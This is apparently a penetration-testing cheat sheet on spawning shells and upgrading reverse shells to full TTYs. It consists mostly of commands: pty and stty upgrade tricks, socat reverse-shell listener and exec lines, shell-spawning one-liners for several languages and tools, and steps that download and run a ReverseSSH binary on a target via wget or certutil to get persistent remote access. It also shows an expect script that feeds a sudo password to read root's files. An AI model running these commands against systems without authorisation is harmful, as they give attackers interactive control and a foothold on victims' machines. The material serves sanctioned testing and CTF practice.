Full TTYs
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Full TTY
Note that the shell you set in the SHELL
variable must be listed inside /etc/shells or The value for the SHELL variable was not found in the /etc/shells file This incident has been reported
. Also, note that the next snippets only work in bash. If you're in a zsh, change to a bash before obtaining the shell by running bash
python3 -c 'import pty; pty.spawn("/bin/bash")'
(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;
You can get the number of rows and columns executing stty -a
script /dev/null -qc /bin/bash #/dev/null is to not store anything
(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;
socat file:`tty`,raw,echo=0 tcp-listen:4444
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:
Spawn shells
python -c 'import pty; pty.spawn("/bin/sh")'
echo os.system('/bin/bash')
/bin/sh -i
script -qc /bin/bash /dev/null
perl -e 'exec "/bin/sh";'
- perl:
exec "/bin/sh";
- ruby:
exec "/bin/sh"
- lua:
- IRB:
exec "/bin/sh"
- vi:
- vi:
:set shell=/bin/bash:shell
- nmap:
A convenient way for interactive shell access, as well as file transfers and port forwarding, is dropping the statically-linked ssh server ReverseSSH onto the target.
Below is an example for x86
with upx-compressed binaries. For other binaries, check releases page.
- Prepare locally to catch the ssh port forwarding request:
# Drop it via your preferred way, e.g.
wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh
/dev/shm/reverse-ssh -v -l -p 4444
- (2a) Linux target:
# Drop it via your preferred way, e.g.
wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh
/dev/shm/reverse-ssh -p 4444 kali@
- (2b) Windows 10 target (for earlier versions, check project readme):
# Drop it via your preferred way, e.g.
certutil.exe -f -urlcache https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86.exe reverse-ssh.exe
reverse-ssh.exe -p 4444 kali@
- If the ReverseSSH port forwarding request was successful, you should now be able to log in with the default password
in the context of the user runningreverse-ssh(.exe)
# Interactive shell access
ssh -p 8888
# Bidirectional file transfer
sftp -P 8888
Penelope automatically upgrades Linux reverse shells to TTY, handles the terminal size, logs everything and much more. Also it provides readline support for Windows shells.
If for some reason you cannot obtain a full TTY you still can interact with programs that expect user input. In the following example, the password is passed to sudo
to read a file:
expect -c 'spawn sudo -S cat "/root/root.txt";expect "*password*";send "<THE_PASSWORD_OF_THE_USER>";send "\r\n";interact'
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